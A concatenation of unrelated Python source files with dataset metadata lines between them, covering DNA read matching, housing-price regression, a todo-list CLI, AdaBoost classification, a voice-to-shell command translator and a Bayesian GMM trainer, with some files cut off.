# -*- coding: utf-8 -*-
"""
Created on Tue Sep 11 10:31:09 2018
@author: Beeta
Implementation of exact matching algorithms
- Naive Exact Matching(Brute Force)
"""
def readFASTA(filename):
    """Read a FASTA file and return its sequence as one string.

    Header lines (starting with '>') are skipped; the remaining lines are
    stripped of trailing whitespace and concatenated.
    """
    with open(filename, 'r') as handle:
        pieces = [line.rstrip() for line in handle if line[0] != '>']
    return ''.join(pieces)
# Reference genome (phiX) used by all of the matching experiments below.
genome = readFASTA('phix.fa')
#=============================
# Naive exact matching
# aka Brute Force
#=============================
# returns offsets of pattern p in text t
def BruteForce(p, t):
    """Naive exact matching: return every offset where pattern p occurs in
    text t, scanning all candidate alignments left to right."""
    occurrences = []
    last_shift = len(t) - len(p)
    for shift in range(last_shift + 1):  # every candidate alignment
        # Compare character by character; all() short-circuits on mismatch.
        if all(p[j] == t[shift + j] for j in range(len(p))):
            occurrences.append(shift)
    return occurrences
# Sanity checks of BruteForce on small strings.
p = 'word'
t = 'this sentence contains a word'
occurrences = BruteForce(p, t)
print(occurrences) # 25 is the answer
# Character-comparison bounds for the naive scan: at least one comparison
# per alignment, at most len(p) per alignment.
min_no_comparisons = len(t)-len(p)+1
max_no_comparisons = len(p)*(len(t)-len(p)+1)
print(min_no_comparisons, max_no_comparisons) #answer is 26 & 104
p = 'AG'
t = 'AGCCCTTTGATAGTTTCAG'
BruteForce(p,t) # answer is [0, 11, 17]
# test the answer
print(t[:2], t[11:13], t[17:19])
# generate artifical reads from random positions in a given genome phix
import random
def generateReads(genome, numReads, readLen):
    """Sample numReads substrings of length readLen at random positions.

    Bug fix: the original computed ``randint(0, len(genome)-readLen) - 1``,
    so start could be -1 and ``genome[-1:readLen-1]`` produced an empty (or
    wrong) string instead of a genuine read of the genome.
    """
    reads = []
    for _ in range(numReads):
        # randint is inclusive on both ends, so every full-length window
        # (including the last one) is reachable.
        start = random.randint(0, len(genome) - readLen)
        reads.append(genome[start: start+readLen])
    return reads
# Sample 100 artificial 100bp reads directly from the genome.
reads = generateReads(genome, 100, 100)
print(reads)
# matching artifical reads
# how many of these reads match the genome exactly
# obviously the answer should be all of them bc
# these are generated from this genome and there is no error involved
numMatched = 0
for r in reads:
    matched = BruteForce(r ,genome)
    if len(matched) > 0:
        numMatched += 1
print('%d / %d reads matched the genome exactly' % (numMatched, len(reads)))
"""
# using python string methods
example = 'this sentence contains a word'
example.find('word') #find method returns the offset of the pattern (the leftmost)
# 'word' occurs at offset 25
"""
# matching real reads
# from a FASTQ file ERR266411_1.for_asm.fastq
# that has real reads from phix
def readFASTQ(filename):
    """Parse a FASTQ file; return (sequences, qualities) as parallel lists.

    Each record is four lines: '@' name, bases, '+' separator, qualities.
    Reading stops when an empty sequence line is seen (readline() returns
    '' at end of file).
    """
    sequences = []
    qualities = []
    with open(filename, 'r') as fh:
        while True:
            fh.readline()                  # line 1: '@' read name (ignored)
            seq = fh.readline().rstrip()   # line 2: the bases
            if not seq:                    # EOF reached
                break
            fh.readline()                  # line 3: '+' separator (ignored)
            qualities.append(fh.readline().rstrip())  # line 4: quality string
            sequences.append(seq)
    return sequences, qualities
# Real sequencing reads (qualities ignored here).
phix_reads, _ = readFASTQ('ERR266411_1.for_asm.fastq')
print(phix_reads, len(phix_reads))
# Count how many full-length real reads match the genome exactly.
numMatched = 0
total = 0
for r in phix_reads:
    matched = BruteForce(r, genome)
    total += 1
    if len(matched) > 0:
        numMatched += 1
print('%d / %d reads matched the genome' % (numMatched, total))
# answer is 502 / 10000 reads matched the genome
# bc of sequencing errors or
# bc the reference genome is double stranded and we checked only one
# now lets change it to matching only 30 first bases of reads
numMatched = 0
total = 0
for r in phix_reads:
    # Prefixes are less error-prone, so more of them match exactly.
    r = r[:30]
    matched = BruteForce(r, genome)
    total += 1
    if len(matched) > 0:
        numMatched += 1
print('%d / %d reads matched the genome' % (numMatched, total))
# answer is 3563 / 10000 reads matched the genome
# still very low matching
# so lets do the same thing for the reverse complement of the read
def reverseComplement(s):
    """Return the reverse complement of DNA string s ('N' maps to 'N')."""
    pair = {'A':'T', 'C':'G', 'T':'A', 'G':'C', 'N':'N'}
    # Walk the string right-to-left, complementing each base.
    return ''.join(pair[base] for base in reversed(s))
# Quick smoke test of reverseComplement on a real read.
reverseComplement(phix_reads[1])
# Match 30bp prefixes against BOTH strands of the reference.
numMatched = 0
total = 0
for r in phix_reads:
    r = r[:30]
    matched = BruteForce(r, genome) # matches in forward strand
    matched.extend(BruteForce(reverseComplement(r), genome)) # matches in reverse strand
    total += 1
    if len(matched) > 0:
        numMatched += 1
print('%d / %d reads matched the genome' % (numMatched, total))
# answer is 8036 / 10000 reads matched the genome
# much better result
0e341e8d134c21a6461e8bd2cd0592c6f105b6fd | Python | realqnn/GoogleML-learn | /validation.py | UTF-8 | 4,720 | 3.015625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
使用多个特征而非单个特征来进一步提高模型的有效性
调试模型输入数据中的问题
使用测试数据集检查模型是否过拟合验证数据
"""
import math
from IPython import display
from matplotlib import cm
from matplotlib import gridspec
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn import metrics
import tensorflow as tf
from tensorflow.python.data import Dataset
from tensorflow_first_learn import LinearRe
# Quiet TF logging and compact pandas display.
tf.logging.set_verbosity(tf.logging.ERROR)
pd.options.display.max_rows = 10
pd.options.display.float_format = '{:.1f}'.format
# Load the California-housing training data from the public bucket.
california_housing_dataframe = pd.read_csv("https://storage.googleapis.com/ml_universities/california_housing_train.csv", sep=",")
# Randomize the row order before splitting into train/validation sets.
california_housing_dataframe = california_housing_dataframe.reindex(
    np.random.permutation(california_housing_dataframe.index)
)
def preprocess_feature(dataframe):
    """Select the model's input features from the raw housing DataFrame.

    Copies the eight raw feature columns and appends the synthetic
    ``rooms_per_person`` feature (total_rooms / population).

    :param dataframe: pandas DataFrame with the raw census columns.
    :return: new DataFrame containing only the model features.
    """
    feature_columns = [
        "latitude",
        "longitude",
        "housing_median_age",
        "total_rooms",
        "total_bedrooms",
        "population",
        "households",
        "median_income",
    ]
    processed_features = dataframe[feature_columns].copy()
    # Synthetic feature: average number of rooms per inhabitant.
    processed_features["rooms_per_person"] = (
        dataframe["total_rooms"] / dataframe["population"]
    )
    return processed_features
def preprocess_targets(dataframe):
    """Build the regression target: median house value in thousands.

    :param dataframe: pandas DataFrame with a ``median_house_value`` column.
    :return: single-column DataFrame with the scaled target.
    """
    # Scale to units of $1000 so the target has a modest numeric range.
    scaled_value = dataframe["median_house_value"] / 1000.0
    return pd.DataFrame({"median_house_value": scaled_value})
# Build the training set from the first 12000 (shuffled) rows.
training_examples = preprocess_feature(california_housing_dataframe.head(12000))
# print(training_examples.describe())
training_targets = preprocess_targets(california_housing_dataframe.head(12000))
# print(training_targets.describe())
# Build the validation set from the last 5000 rows.
validation_examples = preprocess_feature(california_housing_dataframe.tail(5000))
# print(validation_examples.describe())
validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))
# print(validation_targets.describe())
# #绘制纬度/经度与房屋价值中位数的曲线图
# plt.figure(figsize=(13, 8))
#
# ax = plt.subplot(1, 2, 1)
# ax.set_title("Validation Data")
#
# ax.set_autoscaley_on(False)
# ax.set_ylim([32, 43])
# ax.set_autoscalex_on(False)
# ax.set_xlim([-126, -112])
# plt.scatter(validation_examples["longitude"],
# validation_examples["latitude"],
# cmap="coolwarm",
# c=validation_targets["median_house_value"]/validation_targets["median_house_value"].max())
# ax = plt.subplot(1,2,2)
# ax.set_title("Training Data")
#
# ax.set_autoscaley_on(False)
# ax.set_ylim([32, 43])
# ax.set_autoscalex_on(False)
# ax.set_xlim([-126, -112])
# plt.scatter(training_examples["longitude"],
# training_examples["latitude"],
# cmap="coolwarm",
# c=training_targets["median_house_value"] / training_targets["median_house_value"].max())
# plt.show()
# Train the multi-feature linear regressor defined in tensorflow_first_learn.
lr = LinearRe()
LINEAR_REGRESSOR = lr.train_model_moreFeatures(
    learning_rate=0.00003,
    steps=500,
    batch_size=5,
    training_examples=training_examples,
    training_targets=training_targets,
    validation_examples=validation_examples,
    validation_targets=validation_targets
)
# Evaluate on the held-out test CSV.
california_housing_test_data = pd.read_csv("https://storage.googleapis.com/ml_universities/california_housing_test.csv", sep=",")
test_examples = preprocess_feature(california_housing_test_data)
test_targets = preprocess_targets(california_housing_test_data)
# One pass over the test set, unshuffled, for prediction.
predict_test_input_fn = lambda: lr.my_input_fn(
    test_examples,
    test_targets["median_house_value"],
    num_epochs=1,
    shuffle=False)
test_predictions = LINEAR_REGRESSOR.predict(input_fn=predict_test_input_fn)
test_predictions = np.array([item['predictions'][0] for item in test_predictions])
root_mean_squared_error = math.sqrt(
    metrics.mean_squared_error(test_predictions, test_targets))
print ("Final RMSE (on test data): %0.2f" % root_mean_squared_error)
9be339d0949286e23b23bf1de06326b61e645e95 | Python | javid-aliyev/Todo-list-application-Python | /app.py | UTF-8 | 4,067 | 2.625 | 3 | [] | no_license | import sys
import hashlib
import tools
import db_creator
from task import Task
from account import Account
class App:
    """Interactive command loop for the todo application.

    Keeps the mapping from displayed task indices to tasks and the name of
    the currently active account ("guest" by default).
    """

    def __init__(self, argv):
        self._argv = argv        # raw command-line arguments (currently unused)
        self.id2task = {}        # displayed index -> (task, done-status)
        self.account = "guest"   # current account
        self.main()              # start the interactive loop immediately

    def _id2task(self, tasks):
        """Returns a dict where key is a 1-based display index and value is
        a (task, status) tuple, where [0] is the task and [1] is its status.

        :param tasks: dict
        :return: dict
        """
        result = {}
        for index, task in zip(range(1,len(tasks)+1), tasks.items()):
            result[index] = task
        return result

    def _execute_command(self, command):
        """Executes a given command against the current account
        (``self.account``).

        :param command: str
        """
        # task commands
        if command == "add":
            task = tools._sinput("task? ").strip()
            if task != "":
                Task.create(task, self.account)
        elif command == "rmall":
            Task.remove_accounts_tasks_without_slot(self.account)
        elif command == "ls":
            tasks = Task.get(self.account)
            if tasks:
                for i, task in zip(range(1, len(tasks)+1), tasks.items()):
                    if task[1]:
                        tools.success(f"{i}. {task[0]}") # green output print
                    else:
                        print(f"{i}. {task[0]}")
        # FIX NEXT 8 lines (find more elegant answer). Also tools.process.. is tmp function
        elif command == "rm":
            print("{index_of_task} or \\{task_name}")
            tools.process_task_or_index(self.id2task, command, self.account, Task.remove)
        elif command == "done":
            print("{index_of_task} or \\{task_name}")
            tools.process_task_or_index(self.id2task, command, self.account, Task.mark_as, done=True)
        elif command == "undone":
            print("{index_of_task} or \\{task_name}")
            tools.process_task_or_index(self.id2task, command, self.account, Task.mark_as, done=False)
        # account commands
        elif command == "addacc":
            login = tools._sinput("login? ")
            password = tools._secured_sinput("password(not required)? ")
            # Only the SHA-256 digest of the password is stored.
            password = hashlib.sha256(password.encode("utf8")).hexdigest()
            if login.strip() == "":
                tools.warn("login form is required")
            else:
                Account.create(login, password)
                # a slot in tasks.json
                Task.create_slot_for(login)
        elif command == "rmacc":
            account = tools._sinput("account to remove? ")
            password = tools._secured_sinput("password of the account? ")
            password = hashlib.sha256(password.encode("utf8")).hexdigest()
            real_password = Account.get_password_by_login(account) # real hashed password
            if account == "":
                tools.error("invalid account")
                return
            # Deleting the active account would leave the app in a bad state.
            if account == self.account:
                tools.error("you cannot delete the account you are on at the moment (go to the guest account)")
                return
            if password == real_password:
                Account.remove(account)
                Task.remove_accounts_tasks(account)
        elif command == "lsaccs":
            for account in Account.get():
                # The active account is highlighted in green.
                if account == self.account:
                    tools.success(f"* {account}")
                else:
                    print(f"* {account}")
        elif command == "login":
            account = tools._sinput("account to login? ")
            password = tools._secured_sinput("password of the account? ")
            password = hashlib.sha256(password.encode("utf8")).hexdigest()
            real_password = Account.get_password_by_login(account) # real hashed password
            if account == "":
                tools.error("invalid login")
                return
            # Hash comparison: passwords are never compared in plain text.
            if password == real_password:
                self.account = account
                tools.success(f"you logged in as {account}")
            else:
                tools.error("invalid login or password")
        elif command == "whoami":
            tools.success(self.account)
        # other commands
        elif command == ":quit":
            sys.exit()
        elif command == ":clear":
            tools._clear_console()
        elif command == ":help":
            tools._print_help_info()
        elif command == "":
            pass    # empty input: just re-prompt
        else:
            tools.error(f"no such command: '{command}'")

    def main(self):
        """Run the read-eval loop until ':quit' exits the process."""
        tools.info("type ':help' to get all commands")
        while True:
            # Refresh the index mapping so rm/done/undone see current tasks.
            self.id2task = self._id2task(Task.get(self.account))
            npt = tools._sinput("~> ").strip()
            self._execute_command(npt)
if __name__ == "__main__":
    # First run: create the database before starting the app.
    # NOTE(review): the message is printed before create_database() runs, so
    # it is shown even if creation subsequently fails.
    if not tools.db_exists():
        tools.info("database was created")
        db_creator.create_database()
    App(sys.argv)
2f55793e6d7b9b1850ef296c49ccfa7ac2affdbd | Python | stevewfogarty/todo-api-fastapi | /model/model.py | UTF-8 | 414 | 2.640625 | 3 | [
"MIT"
] | permissive | from pydantic import BaseModel
from datetime import datetime
from typing import NewType, Optional
# Distinct NewType alias of int used for task identifiers.
# NOTE(review): the NewType's runtime name is "id" while the alias is ID.
ID = NewType("id", int)
class Task(BaseModel):
    """
    Definition of the components of a task
    """
    summary: str   # short human-readable description of the task
    priority: int  # numeric priority; ordering semantics not defined here -- TODO confirm
    # due_date: Optional[datetime]
class TaskList(BaseModel):
    """
    Definition of a TaskList entry: a task together with its identifier
    """
    id: ID       # unique task identifier (NewType over int)
    task: Task   # the task payload
9745361200c4745ac9af12e47df52f7a6f478e4b | Python | ingwplanchez/Python | /Program_35_Anidamiento3.py | UTF-8 | 469 | 2.640625 | 3 | [] | no_license | #-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: James Marshall
#
# Created: 21/04/2012
# Copyright: (c) James Marshall 2012
# Licence: <your licence>
#-------------------------------------------------------------------------------
def main():
pass
if __name__ == '__main__':
main()
for i in range(0,4):
for j in range(0,4):
for k in range(0,4):
print i,j,k | true |
892617551092658a4e327acedb1ad1db220db69d | Python | harinisridhar1310/Guvi | /Count_digit.py | UTF-8 | 72 | 2.96875 | 3 | [] | no_license | #harini
# Read one integer from stdin and print how many decimal digits it has.
n = abs(int(input()))  # the sign never affects the digit count
count = 0
while n > 0:
    n = n // 10
    count += 1
if count == 0:
    # Fix: the original printed 0 for input 0, but 0 has one digit.
    count = 1
print(count)
| true |
8e35a9deb46afc08933a81b2ea801fd73b18dbb6 | Python | code1077/Python_practice_AOFI_1718 | /obregon-avila-steven/ejercicio6.py | UTF-8 | 301 | 3.546875 | 4 | [] | no_license |
# Repeatedly read integers and report whether each is even or odd,
# until the user answers anything other than "Si".
numero = 0
bucle = "Si"
while bucle == "Si":
    numero = int(input("Introduce el numero que quieras:\n"))
    if (numero % 2 == 0):
        print("Este numero es par")
    if (numero % 2 != 0):
        print("Este numero es impar")  # fixed typo: "inpar" -> "impar"
    bucle = input("Quieres añadir mas datos a la tabla?: si/no ?\n")
    # Fix: the source was truncated here with an empty `if` body, which is a
    # SyntaxError.  The break is redundant with the while condition but
    # completes the truncated statement.
    # NOTE(review): the prompt suggests "si/no" but only exactly "Si" continues.
    if bucle != "Si":
        break
7a92868d87b1d77c277463e08315ea58fc3a2973 | Python | jrodriguezballester/inicioPython2 | /ejercicio3.py | UTF-8 | 604 | 4.46875 | 4 | [] | no_license | ''' Ejercicio 3
Escribir una función filtrar_palabras() que tome una lista de palabras y un entero n, y
devuelva las palabras que tengan más de n carácteres.'''
def filtar_palabras(palabras, n):
palabras_mayores = []
for palabra in palabras:
if len(palabra) > n:
palabras_mayores.append(palabra)
return palabras_mayores
# comprobacion
palabras = ['jose', 'alberto', 'juanito', 'marta', 'pato']
print(f'palabras con mas (estricto) de 5 caracteres:{filtar_palabras(palabras, 5)}')
print(f'palabras con mas (estricto) de 4 caracteres:{filtar_palabras(palabras, 4)}')
| true |
6cc9637815cd81be9a884f173cf76db3b079809d | Python | arnaudmm/django-bootstrap5 | /tests/test_bootstrap_pagination.py | UTF-8 | 2,163 | 2.671875 | 3 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | from django.core.paginator import Paginator
from django_bootstrap5.utils import url_replace_param
from tests.base import BootstrapTestCase
class PaginatorTestCase(BootstrapTestCase):
    """Tests for url_replace_param and the bootstrap_pagination template tag."""

    def test_url_replace_param(self):
        # Replace an existing query parameter; remove it when value is None;
        # insert before the fragment when a #fragment is present.
        self.assertEqual(url_replace_param("/foo/bar?baz=foo", "baz", "yohoo"), "/foo/bar?baz=yohoo")
        self.assertEqual(url_replace_param("/foo/bar?baz=foo", "baz", None), "/foo/bar")
        self.assertEqual(url_replace_param("/foo/bar#id", "baz", "foo"), "/foo/bar?baz=foo#id")

    def bootstrap_pagination(self, page, extra=""):
        """Helper to test bootstrap_pagination tag."""
        return self.render(f"{{% bootstrap_pagination page {extra} %}}", {"page": page})

    def test_paginator(self):
        # 4 objects, 2 per page -> 2 pages; render page 2 (the last page).
        objects = ["john", "paul", "george", "ringo"]
        paginator = Paginator(objects, 2)
        html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/?foo=bar"')
        self.assertHTMLEqual(
            html,
            """
            <nav>
                <ul class="pagination">
                    <li class="page-item"><a class="page-link" href="/projects/?foo=bar&page=1">«</a></li>
                    <li class="page-item"><a class="page-link" href="/projects/?foo=bar&page=1">1</a></li>
                    <li class="page-item active"><a class="page-link" href="#">2</a></li>
                    <li class="page-item disabled"><a class="page-link" href="#">»</a></li>
                </ul>
            </nav>
            """,
        )
        # Links point to page 1 only; the active page (2) must not be linked.
        self.assertIn("/projects/?foo=bar&page=1", html)
        self.assertNotIn("/projects/?foo=bar&page=2", html)
        # The page parameter is inserted before an existing fragment.
        html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/#id"')
        self.assertIn("/projects/?page=1#id", html)
        self.assertNotIn("/projects/?page=2#id", html)
        # An existing page parameter in the url is replaced, not duplicated.
        html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/?page=3#id"')
        self.assertIn("/projects/?page=1#id", html)
        self.assertNotIn("/projects/?page=2#id", html)
        # Extra parameters are appended after the page parameter.
        html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/?page=3" extra="id=20"')
        self.assertIn("/projects/?page=1&id=20", html)
        self.assertNotIn("/projects/?page=2&id=20", html)
| true |
cad5dd0dc7d6655858421499a723926104174146 | Python | whyang78/machineLearning-base | /AdaBoost/simple/病马疝气死亡率.py | UTF-8 | 1,738 | 2.984375 | 3 | [] | no_license | import numpy as np
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import GridSearchCV
def loadDataSet(fileName):
    """Load a TAB-separated data file whose last column is the label.

    Returns (dataMat, labelMat): a list of float feature rows and the list
    of float labels.

    Fixes: the original opened the file twice (once just to count columns)
    and never closed either handle; one context-managed pass suffices, and
    blank lines are now skipped instead of crashing float('').
    """
    dataMat = []
    labelMat = []
    with open(fileName) as fr:
        for line in fr:
            if not line.strip():
                continue  # tolerate blank/trailing lines
            curLine = line.strip().split('\t')
            dataMat.append([float(value) for value in curLine[:-1]])
            labelMat.append(float(curLine[-1]))
    return dataMat, labelMat
if __name__ == '__main__':
    # Horse-colic survival data: train/test splits with +/-1 labels.
    traindata, trainlabel = loadDataSet('../horseColicTraining2.txt')
    testdata, testlabel = loadDataSet('../horseColicTest2.txt')
    # Grid-search AdaBoost hyper-parameters with 10-fold cross-validation.
    clf=AdaBoostClassifier(base_estimator=DecisionTreeClassifier())
    params = {'n_estimators':[1,2,3,4,5,6,7,8,9,10], #np.arange(1,10+1,1) x
              'algorithm':['SAMME','SAMME.R'],
              'base_estimator__max_depth':[1,2,3,4,5,6,7,8,9,10],
              'base_estimator__criterion':['gini','entropy']
              }
    model=GridSearchCV(clf,params,cv=10)
    model.fit(traindata,trainlabel)
    print('最优参数:',model.best_params_)
    print('训练分数:',model.best_score_)
    # Refit a fixed configuration (depth-2 stumps, 10 rounds, SAMME).
    clf=AdaBoostClassifier(DecisionTreeClassifier(max_depth=2),n_estimators=10,algorithm='SAMME')
    clf.fit(traindata,trainlabel)
    test=clf.predict_proba(testdata)
    train_score=clf.score(traindata,trainlabel)
    test_score=clf.score(testdata,testlabel)
    print('训练分数:{:.5f},测试分数:{:.5f}'.format(train_score,test_score))
    # ROC curve from the predicted class probabilities.
    import scikitplot as skplt
    import matplotlib.pyplot as plt
    skplt.metrics.plot_roc(testlabel,test)
    plt.show()
f8edc5b64c85be353575496fe32838741527f893 | Python | teamwork523/Tools | /data/boxErrorBarWithCategories.py | UTF-8 | 1,766 | 3.140625 | 3 | [] | no_license | #!/usr/bin/env python
import sys, math
# convert the data into box error bar plot based on
def getMedian(li):
    """Return the median of an already-sorted sequence.

    None for an empty sequence; the single element itself for length 1;
    otherwise a float (mean of the two middle values when even-sized).
    """
    n = len(li)
    if n == 0:
        return None
    if n == 1:
        return li[0]
    mid = n // 2
    if n % 2:
        return float(li[mid])
    return float(li[mid] + li[mid - 1]) / 2.0
def Usage():
    # Print the command-line synopsis (Python 2 print statement).
    print sys.argv[0] + " cat_col(z) data_col(y) x_label categories_list header < filepath"
def main():
    """Read whitespace-separated rows from stdin and emit, for each
    requested category, the median and the 5th/95th percentile of the data
    column -- one TAB-separated output line.  (Python 2 script.)"""
    DEL = "\t"
    if (len(sys.argv) == 2 and sys.argv[1] == "-h"):
        Usage()
        sys.exit(1)
    # check header: last argv flag says whether to skip the first stdin line
    if sys.argv[-1] == "y" or sys.argv[-1] == "Y":
        header = sys.stdin.readline()
    # Column arguments are 1-based on the command line.
    cat_col = int(sys.argv[1]) - 1
    data_col = int(sys.argv[2]) - 1
    x_label = sys.argv[3]
    cat_list = sys.argv[4:-1]
    dataMap = {}
    while True:
        line = sys.stdin.readline()
        if not line: break
        curData = line.strip().split()
        category = curData[cat_col]
        # Only the categories requested on the command line are collected.
        if category not in cat_list:
            continue
        data = 0.0
        try:
            data = float(curData[data_col])
        except ValueError:
            # Unparsable value: warn and fall through with data = 0.0.
            print >> sys.stderr, "ValueError detected: " + line
        if not dataMap.has_key(category):
            dataMap[category] = []
        dataMap[category].append(data)
    # output result: label, then (median, p5, p95) per category
    line = x_label + DEL
    for category in cat_list:
        sortedData = sorted(dataMap[category])
        dataLen = len(sortedData)
        line += str(getMedian(sortedData)) + DEL
        line += str(sortedData[(int)(0.05*dataLen)]) + DEL
        line += str(sortedData[(int)(0.95*dataLen)]) + DEL
    print line.strip()
if __name__ == "__main__":
main()
| true |
20655507caad922cd618cc2c018fe44eab9a5d1d | Python | shuwenyue/Terminal_talk | /voice.py | UTF-8 | 3,381 | 3.265625 | 3 | [] | no_license | class Voice:
cmdDict = {'copy' : 'cp',
'cp' : 'cp',
'move' : 'mv',
'rename' : 'mv',
'make directory' : 'mkdir',
'list' : 'ls',
'ls' : 'ls',
'remove' : 'rm',
'change directory' : 'cd',
'cd' : 'cd',
'search' : 'grep',
'ssh' : 'ssh',
'python' : 'python',
'bash' : 'bash',
'run' : 'bash',
'go back' : 'cd ..',
'print directory' : 'pwd',
'pwd' : 'pwd',
'open' : 'open',
'say' : 'say',
'touch' : 'touch'} #Dictionary of commands
subsDict = {'user' : '-u',
'all' : '-a',
'recursively' : '-r',
'underscore' : '_',
'star' : '*',
'asterisk' : '*'} #Dictionary of word substitutions
toRem = {'to', 'the', 'a', 'from', 'for'} #Set of words to remove
# Reads in string
def __init__(self, command):
self.cmdStr = self.removeExtra(command.split())
self.argInd = 0
# Returns command as string
def getcommand(self):
try:
cmd = self.cmdDict[self.cmdStr[0]]
self.argInd = 1
return cmd
except KeyError:
try:
cmd = self.cmdDict[self.cmdStr[0]+' '+self.cmdStr[1]]
self.argInd = 2
return cmd
except (KeyError, IndexError) as e:
raise ValueError
# Returns arguments as list
def getarg(self):
if self.argInd == 0:
self.getcommand()
if len(self.cmdStr) == self.argInd:
return []
args = self.cmdStr[self.argInd:]
arg2 = self.substitute(args)
arg3 = self.remSpace(arg2)
return arg3
# Removes superfluous words
def removeExtra(self, argList):
return [arg for arg in argList if arg not in self.toRem]
# Substitutes for words
def substitute(self, argList):
for i in range(len(argList)):
try:
argList[i]=self.subsDict[argList[i]]
except:
pass
return argList
# Remove space after periods, before numbers, and before and after underscore
def remSpace(self, argList):
i = 0
while i < len(argList):
if argList[i][-1] == '.' and i+1 < len(argList):
# Combine with next
argList[i:i+2] = [''.join(argList[i:i+2])]
elif self.checkNum(argList[i][0]) and i > 0:
# Combine with previous
argList[i-1:i+1] = [''.join(argList[i-1:i+1])]
elif argList[i] == '_' and i > 0 and i+1 < len(argList):
# Combine with next and previous
argList[i-1:i+2] = [''.join(argList[i-1:i+2])]
elif argList[i] == '_' and i > 0:
# Combine with previous
argList[i-1:i+1] = [''.join(argList[i-1:i+1])]
elif argList[i] == '_':
# Combine with next
argList[i:i+2] = [''.join(argList[i:i+2])]
else:
i += 1
return argList
# Check if string is number
def checkNum(self, string):
try:
int(string)
return True
except ValueError:
return False
| true |
a6a45f9491deebc14dcd5761248f0cf59fc71167 | Python | nd1511/beer | /recipes/clustering/utils/gmm-train.py | UTF-8 | 3,008 | 2.59375 | 3 | [
"MIT"
] | permissive |
# NOTE(review): the original docstring said "Train a HMM with a given
# alignments", but this script loads a pickled model and trains it on raw
# feature batches (no alignments are read); the filename is gmm-train.py.
'Train a GMM on batches of features (variational Bayes, beer toolkit).'

import random
import numpy as np
import torch
import argparse
import sys
import beer
import pickle
import logging
import os

# Timestamped INFO-level log messages by default.
log_format = "%(asctime)s %(levelname)s: %(message)s"
logging.basicConfig(level=logging.INFO, format=log_format)
def main():
    """Parse the CLI, run variational-Bayes training over the listed
    feature batches, and pickle the updated model to ``out``."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--epochs', type=int, default=1,
                        help='number of epochs to train')
    parser.add_argument('--fast-eval', action='store_true')
    parser.add_argument('--lrate', type=float, default=1.,
                        help='learning rate')
    parser.add_argument('--use-gpu', action='store_true')
    parser.add_argument('--verbose', action='store_true')
    parser.add_argument('model', help='model to train')
    parser.add_argument('batches', help='list of batches file')
    parser.add_argument('feat_stats', help='data statistics')
    parser.add_argument('out', help='output model')
    args = parser.parse_args()
    if args.verbose:
        logging.getLogger().setLevel(logging.DEBUG)
    # Load the data statistics (total frame count used to scale the ELBO).
    stats = np.load(args.feat_stats)
    # Load the batches: one batch-file path per line.
    batches_list = []
    with open(args.batches, 'r') as f:
        for line in f:
            batches_list.append(line.strip())
    # Load the model and move it to the chosen device (CPU/GPU)
    with open(args.model, 'rb') as fh:
        model = pickle.load(fh)
    if args.use_gpu:
        device = torch.device('cuda')
    else:
        device = torch.device('cpu')
    model = model.to(device)
    # Prepare the coordinate-ascent optimizer for the training.
    params = model.mean_field_groups
    optimizer = beer.BayesianModelCoordinateAscentOptimizer(params,
                                                            lrate=args.lrate)
    tot_counts = int(stats['nframes'])
    for epoch in range(1, args.epochs + 1):
        # Shuffle the order of the batches each epoch.
        random.shuffle(batches_list)
        for batch_no, path in enumerate(batches_list, start=1):
            # Reset the gradients.
            optimizer.zero_grad()
            # Load the batch data.
            batch = np.load(path)
            ft = torch.from_numpy(batch['features']).float()
            ft = ft.to(device)
            # Compute the objective function (evidence lower bound).
            elbo = beer.evidence_lower_bound(model, ft, datasize=tot_counts,
                                             fast_eval=args.fast_eval)
            # Compute the (natural) gradient of the model.
            elbo.natural_backward()
            # Update the parameters.
            optimizer.step()
            # Per-frame ELBO for logging.
            elbo_value = float(elbo) / tot_counts
            log_msg = 'epoch={}/{} batch={}/{} elbo={}'
            logging.info(log_msg.format(
                epoch, args.epochs,
                batch_no, len(batches_list),
                round(elbo_value, 3))
            )
    # Always save on CPU so the pickle loads on machines without a GPU.
    with open(args.out, 'wb') as fh:
        pickle.dump(model.to(torch.device('cpu')), fh)
main()
| true |
9c4642126876201ba910749fd7812f76f15d9c5d | Python | HelsinkiGroup5/Hackathon | /rto.py | UTF-8 | 11,200 | 3.3125 | 3 | [
"MIT"
] | permissive | import numpy as np
class MotionExplorer:
    """Explore motions represented as sampled observations of an n-dimensional vector.

    The stream of vectors describes a vector space in which the Mahalanobis
    distance is used to assess how far new samples are from previously seen
    ones. Whenever the K nearest neighbours of a new sample are, on average,
    further away than N standard deviations, the sample is deemed original
    and appended to the ``observations`` attribute.
    """

    def __init__(self, inputdim=2, stepsize=10, order=4, window=30,
                 start_buffer=10, periodic_recompute=5, number_of_neighbour=5,
                 number_of_stdev=4.5):
        """
        Parameters
        ----------
        inputdim : int
            Number of dimensions of the input vector.
        stepsize : int
            Size of the interpolation step in milliseconds.
        order : int
            Dimension of the output vector: 1 is position only, 2 adds
            velocity, 3 adds acceleration, and so on.
        window : int
            Size of the averaging window in samples.
        start_buffer : int
            Number of samples observed before any observation can be saved;
            leaves time for the Savitsky-Golay interpolation to start
            outputting data.
        periodic_recompute : int
            Number of samples after which the mean and covariance of the
            saved observations are recomputed.
        number_of_neighbour : int
            Number of closest neighbours considered when assessing whether a
            new sample is original.
        number_of_stdev : float
            Mahalanobis-distance threshold (in standard deviations): when the
            mean distance to the K nearest neighbours exceeds this value, the
            new sample is saved to ``observations``.
        """
        self.inputdim = inputdim
        self.order = order
        ## filtering: one filter chain per input dimension
        self.axis = [AxisFilter(stepsize, order, window) for _ in range(inputdim)]
        ## observation space
        self.observations = np.zeros((1, self.inputdim * self.order))
        self.mean = np.zeros(self.inputdim * self.order)
        self.icov = np.eye(self.inputdim * self.order)
        ## bookkeeping
        self.counter = 0
        self.start_buffer = start_buffer
        self.periodic_recompute = periodic_recompute
        # Bug fix: these thresholds were hard-coded to 5 and 4.5, silently
        # ignoring the constructor arguments.
        self.number_of_neighbour = number_of_neighbour
        self.number_of_stdev = number_of_stdev
        self.last_sample = np.zeros(self.inputdim * self.order)

